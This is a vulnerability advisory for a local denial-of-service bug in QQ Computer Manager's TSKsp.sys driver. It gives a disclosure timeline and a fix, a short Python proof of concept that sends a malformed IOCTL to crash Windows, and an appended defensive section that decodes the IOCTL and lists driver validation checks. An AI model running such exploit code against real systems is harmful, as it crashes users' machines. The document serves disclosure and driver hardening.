QQ Computer Manager TSKsp.sys Driver Local Denial of Service Vulnerability
By Lufeng Li of Neusoft Corporation
Vulnerable: QQpcmgr<=v4.0Beta1
Vendor: Tencent Inc
1) Software Description:
After more than three years of development and operation, QQ Doctor has reached its fourth
generation: QQ Computer Manager 4.0. Version 4.0 not only integrates QQ Doctor and QQ
Software Management, but also adds cloud-based Trojan scanning and plug-in cleanup as core
functions. In addition, QQ Computer Manager introduces a software-move feature that makes it
easy to solve the problem of insufficient space on drive C.
2) Details:
QQ Computer Manager contains a local denial-of-service vulnerability in the TSKsp.sys driver's
handling of an ioctl request. A successful attack can lead to a BSoD.
3) Timeline:
2010.07.01 Vendor notified
2010.07.22 Vendor released new fixed versions
2010.08.09 Advisory released
4) Solution:
Update to version QQPCMgr_40_278.
5) Exploit:
#!/usr/bin/python
#################################################################
#################################################################
from ctypes import *

kernel32 = windll.kernel32
Psapi = windll.Psapi

if __name__ == '__main__':
    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2
    DEVICE_NAME = "\\\\.\\tsksp"
    dwReturn = c_ulong()
    out_data = ''
    in_data = ''
    # Open a handle to the TSKsp.sys device object.
    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
                                          0, None, CREATE_ALWAYS, 0, None)
    # Send IOCTL 0x22e01c with empty, zero-length input and output buffers.
    dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data, 0, out_data,
                                         0, byref(dwReturn), None)
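
For triage, the IOCTL code 0x22e01c used above can be split into its CTL_CODE fields to see which transfer method the driver has to validate. The following is an added example, not part of the original advisory or the vendor's code; the function names decode_ioctl and review_notes are hypothetical, and the advisory does not state the root cause, so the notes are general driver review points only.

```python
# Added example (not from the advisory): decode a Windows IOCTL code.
# CTL_CODE layout: DeviceType[31:16] | Access[15:14] | Function[13:2] | Method[1:0]
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
ACCESS = ("FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS")

DIRECT = ("check the lengths, Irp->MdlAddress and the result of "
          "MmGetSystemAddressForMdlSafe for NULL")
# Buffer checks a dispatch routine owes each transfer method (general WDM rules).
CHECKS = {
    "METHOD_BUFFERED": "compare InputBufferLength/OutputBufferLength with the "
                       "expected size before using Irp->AssociatedIrp.SystemBuffer",
    "METHOD_IN_DIRECT": DIRECT,
    "METHOD_OUT_DIRECT": DIRECT,
    "METHOD_NEITHER": "ProbeForRead/ProbeForWrite the raw user pointers inside "
                      "a try/except block",
}


def decode_ioctl(code):
    """Split a 32-bit IOCTL code into its CTL_CODE fields."""
    function = (code >> 2) & 0xFFF
    return {
        "device_type": (code >> 16) & 0xFFFF,   # 0x22 is FILE_DEVICE_UNKNOWN
        "access": ACCESS[(code >> 14) & 0x3],
        "function": function,
        "vendor_defined": function >= 0x800,    # values below 0x800 are reserved
        "method": METHODS[code & 0x3],
    }


def review_notes(code, in_len, out_len):
    """Return the validation points a reviewer should check for this request."""
    fields = decode_ioctl(code)
    notes = [CHECKS[fields["method"]]]
    if fields["method"] == "METHOD_BUFFERED" and in_len == 0 and out_len == 0:
        notes.append("both lengths are zero, so SystemBuffer is NULL for this request")
    if fields["access"] == "FILE_ANY_ACCESS":
        notes.append("the I/O manager requires no read or write access on the handle")
    return notes


if __name__ == "__main__":
    code, in_len, out_len = 0x22E01C, 0, 0  # values from the request on this page
    for key, value in decode_ioctl(code).items():
        print(key, value if isinstance(value, (str, bool)) else hex(value))
    for note in review_notes(code, in_len, out_len):
        print("check:", note)
```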